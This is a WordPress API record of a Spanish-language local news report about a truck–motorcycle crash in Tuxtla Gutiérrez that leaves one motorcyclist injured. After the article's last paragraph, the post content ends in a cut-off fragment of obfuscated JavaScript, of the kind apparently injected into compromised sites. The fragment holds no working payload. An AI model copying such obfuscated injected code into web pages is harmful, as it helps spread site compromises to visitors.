{"id":9573,"date":"2023-04-17T04:06:12","date_gmt":"2023-04-17T04:06:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9573"},"modified":"2023-04-17T04:06:13","modified_gmt":"2023-04-17T04:06:13","slug":"un-herido-deja-accidente-de-transito-en-jardines-del-pedregal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9573","title":{"rendered":"Un herido deja accidente de tr\u00e1nsito en Jardines del pedregal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681703695267.jpg\" alt=\"\" class=\"wp-image-9574\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681703695267.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681703695267-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 16 de abril del 2023. Tuxtla Guti\u00e9rrez.- Un accidente de tr\u00e1nsito ocurrido este domingo por la tarde en el fraccionamiento Jardines del pedregal dej\u00f3 un saldo de un motociclista herido.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando una camioneta Ford Ranger circulaba en la Avenida Miner y al llegar al Al Bulevar Rub\u00ed gir\u00f3 a la izquierda fue en ese momento que, el conductor de la moto Italika de color gris intent\u00f3 rebasar y se impact\u00f3 en el costado izquierdo de la unidad.<\/p>\n\n\n\n<p>Por el golpe, el motociclista sali\u00f3 volando y se impact\u00f3 contra el pavimento qued\u00f3 al lado de un poste.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil Municipal para atender al herido y lo trasladaron al hospital G\u00f3mez Maza para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>En el lugar los involucrados llegaron a un acuerdo para evitar el levantamiento de las unidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 16 de abril del 2023. Tuxtla Guti\u00e9rrez.- Un accidente de tr\u00e1nsito ocurrido este domingo por la tarde en el fraccionamiento Jardines del pedregal dej\u00f3 un saldo de un motociclista herido. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando una camioneta Ford Ranger circulaba en la Avenida Miner y al &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9574,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9573","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9573","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9573"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9573\/revisions"}],"predecessor-version":[{"id":9575,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9573\/revisions\/9575"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9574"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9573"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9573"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9573"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}